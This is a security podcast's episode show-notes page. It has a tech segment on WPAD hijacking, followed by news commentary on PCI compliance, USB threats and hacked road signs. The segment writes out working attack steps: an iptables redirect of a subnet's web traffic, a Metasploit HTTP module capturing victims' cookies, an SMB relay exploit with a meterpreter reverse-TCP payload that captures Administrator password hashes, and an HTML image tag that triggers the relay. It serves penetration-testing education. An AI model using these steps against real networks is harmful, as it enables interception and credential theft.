Episode138

From Security Weekly Wiki
Jump to navigationJump to search

Sponsors

  • Tenable Network Security - This episode sponsored by Tenable network security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notably the creators of Nessus, the worlds best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Nessus Professional Feed to detect vulnerabilities in your network today! Tenable – Unified Security Monitoring!
  • Core Security - This episode is also sponsored by Core Security Technologies, helping you penetrate your network. Now version 10.0 with WiFi-fu good to go! Rock out with your 'sploit out! Listen to this podcast and qualify to receive a 10% discount on Core Impact, the worlds best penetration testing tool.
  • Trustwave Spiderlabs - Trustwave's SpiderLabs - providing advanced information security services to planet Earth. Visit them online at trustwave.com/spiderlabs!


Announcements & Shameless Plugs

Welcome to PaulDotCom Security Weekly, Episode 138 for January 29th, 2009. A show for security professionals and by security professionals who have way too much access to beer. and computers. and maltego.


Tech segment: WPAD Attacks & Metasploit 3.2 - Part I

WPAD is a feature within Windows that allows the web browser to automatically find the proxy server on the network, and configure it for the local system. It does this in a very interesting way, by looking up the DNS name "wpad.<my domain>.com" and making a request as follows:

GET /wpad.dat HTTP/1.0

The "wpad.dat" file contains the IP address and port of the proxy server the client should use.

You will need to then redirect everything to an IP address and port that is running a proxy. You can do this in Linux with:

/sbin/iptables -t nat -A PREROUTING -s 192.168.1.0/255.255.255.0 -p tcp -m tcp --dport 80 -j DNAT --to-destination 192.168.1.88

Credit: http://www.ex-parrot.com/~pete/upside-down-ternet.html :)

You try using tinyproxy or Squid to redirect the traffic. Below is tinyproxy config:

ifconfig eth0:1 192.168.1.88 netmask 255.255.255.0

Port 80
Listen 192.168.1.88
Allow 192.168.1.0/24

The above works great, if you only want to snoop on all HTTP traffic, which can be interesting.

Run Metasploit:



msf > use auxiliary/server/capture/http 
msf auxiliary(http) > set FORMSDIR /metasploit/framework-3.2/myhttp/forms
FORMSDIR => /metasploit/framework-3.2/myhttp/forms
msf auxiliary(http) > set SITELIST /metasploit/framework-3.2/myhttp/sites.txt
SITELIST => /metasploit/framework-3.2/myhttp/sites.txt
msf auxiliary(http) > set SRVHOST 192.168.1.229
SRVHOST => 192.168.1.229
msf auxiliary(http) > set SRVPORT 80
SRVPORT => 80
msf auxiliary(http) > set SSL false 
SSL => false
msf auxiliary(http) > set TEMPLATE /metasploit/framework-3.2/myhttp/index.html
TEMPLATE => /metasploit/framework-3.2/myhttp/index.html
msf auxiliary(http) > exploit
[*] Auxiliary module running as background job
msf auxiliary(http) > 
[*] Server started.

[*] HTTP REQUEST 192.168.1.246 > www.i-hacked.com:80 GET / Windows IE 7.0 cookies=mosvisitor=1; 97e6aefafad7fca1092546ba935d59f1=5390e4fb65942b827cc8221294e0e229; __utma=128795412.1799712433591043600.1233350820.1233350820.1233350820.1; __utmb=128795412.1.10.1233350820; __utmc=128795412; __utmz=128795412.1233350820.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
[*] HTTP REQUEST 192.168.1.246 > google.com:80 GET / Windows IE 7.0 cookies=PREF=ID=a656bc696693fd3f:TM=1233349495:LM=1233349495:S=uu5i7X-pUjk3Iq7L; NID=19=R2E6AOPpdtOd-ngandXg1vuKngS5_1bHbjrNUh47kYSeSw99gjU5_b6MPeVhZy6nr0LitgPIIylAZzSiF9KJat54m5uC8NnDAR5ZvuMHmkM0Wdpq-RTwqlDd3nVhkt7W

msf > use exploit/windows/smb/smb_relay 
msf exploit(smb_relay) > set SRVHOST 192.168.1.229
SRVHOST => 192.168.1.229
msf exploit(smb_relay) > set PAYLOAD windows/meterpreter/reverse_tcp 
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(smb_relay) > exploit
[*] Exploit running as background job.

[*] Received 192.168.1.246:4295 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
[*] Sending Access Denied to 192.168.1.246:4295 \
[*] Received 192.168.1.246:4297 PAUL-WINDOWS-VM\Administrator LMHASH:faa8<snip>d530d NTHASH:a7a660f836<snip>fd3 OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1

The index.html file contains:

<img src="\\192.168.1.229\Share\pic.jpg">

Important! Make sure its set to your IP address! Of course, the next step is to get Metasploit working and relaying traffic to the ultimate destination while still being able to do the SMB relay.

Stories For Discussion

Social Engineering To Become A Police Officer

0wned By Compliance - [PaulDotCom] - Anton goes through some seemingly realistic scenarios as to why/how a merchant can be 0wned, even if PCI compliant. Yes, PCI still has merit as a "Standard", but this does not mean they are secure. I think this is where people go wrong, PCI, in my opinion, just proves that you are doing some stuff in the name of security. This is important when companies want to work together, they can ask, "Are you PCI compliant" and have some sense that they are implementing security. Or are they? Anton points out it depends on who is doing the audit, anyone can walk in and ask "Do you have a firewall?", answer: "yes". Reminds me of a story about a firewall with two holes in it, through which an Ethernet cable was being passed, therefore all traffic was "going through the firewall".

PADJACK, really? - [PaulDotCom] - I hate to rip on companies. I believe in hard work and a free market, and I like to think that in every company there are honest people working their butts off. However, I'm going to go out on a limb here and say, wow this is stupid. My bet, Larry can bypass this in about 5 seconds and gain access to the port. This is just the wrong way to approach the problem. A piece of plastic is not going to stop an attacker, it may slow them down for a few seconds, but does not provide enough security to make it worth while.

Dradis v2 - Larry - Dradis is a tool (linux) used for sharing information across multiple folks on a pen test. Looks pretty cool, and I'm going to check it out. We've talked about using a wiki for this in the past, but it can easily get overwhelmed with disorganized information. Dradis features a nice hierarchical structure that may work for some people..

USB Drive Threat & Solutions - [PaulDotCom] - Its no question, there are threats that USB drives pose to your organization. I like to use the Coke example. Coca Cola has the secret recipe to its famous Coke soda. Its locked away somewhere in the Coke factory. For the purposes of this example, lets say that its on the network somewhere, and not just written down on paper. You can train the users all you like, someone is going to plug something into the computer that could steal the coke recipe, or be used to make a copy of it. The solution? There is software on the market that will limit which devices you can plug into your systems in the domain. I won't mention vendors, you should evaluate all the options and make a decision for your self. The one I tested worked well, provided you were not admin on the machine. The software does limit the USB pen testing scenario we talk about, however to steal something make sure there is no CD-Writer in the machine :)

Zombies ahead! - [Larry] - Nice job to the i-hacked guys. Beware, Zombies! They illustrated how to change the output on those traffic signs on the side of the road, which was incredibly easy to change (go figure, they need to be usable by a diversely educated crowd). I find it amusing that now Texas (and allegedly the country) are "scrambling" to secure these devices. Looks like in the past the default passwords were left, slightly changed, or written inside the boxes. Texas DOT claims the boxes were locked, but how many of us think that it is true? How easily are padlocks bypassed? I think what this really boils down to is the total commitment to apathy on security in other fields...if they didn't want this stuff messed with, you should take steps to make it "un-messable".

Looking forward to these Shmoo talks:

  • One Track Mind: Building the 2008 and 2009 ShmooBall Launchers, Larry Pesce and David Lauer
  • Building an All-Channel Bluetooth Monitor, Michael Ossmann and Dominic Spill
  • Man in the Middling Everything with The Middler, Jay Beale
  • Building Wireless Sensor Hardware and Software, Travis Goodspeed and Joshua Gourneau
  • Storming the Ivy Tower: How to Hack Your Way into Academia, Sandy Clark (Interesting, I gave a similar presentation a loooong time ago. Go easy, it was a looong time ago and it well, okay it kinda stinks, but some cool stuff in there still, I think).

Best talk title: 802.11 ObgYn or "Spread Your Spectrum", Rick Farina


Youtube and Geotagging - [Larry] - I had the pleasure of chatting with Mark about this one. Mark's been doing some research with google and youtube and the geotagging of the videos. It seems pretty random where the geotageed data comes from, but we're both betting that some folks know how it got there. Marks method is great for taking the youtube ID and tracking it to a location. Mark thinks he might know where a few internet celebrities live. Hello Obama girl!

Damn Vulnerable Linux 1.5 is out! - [Larry] - DVL is a great way to put a system in your lab that you can test against. It has plenty of holes so you're almost guaranteed a successful compromise.

Don't forget the internal threat - [Larry] - This sounds like an almost disastrous situation that was avoided by Fannie Mae. Someone *ahem* needs to look at their employee termination practices, especially with folks that have elevated rights...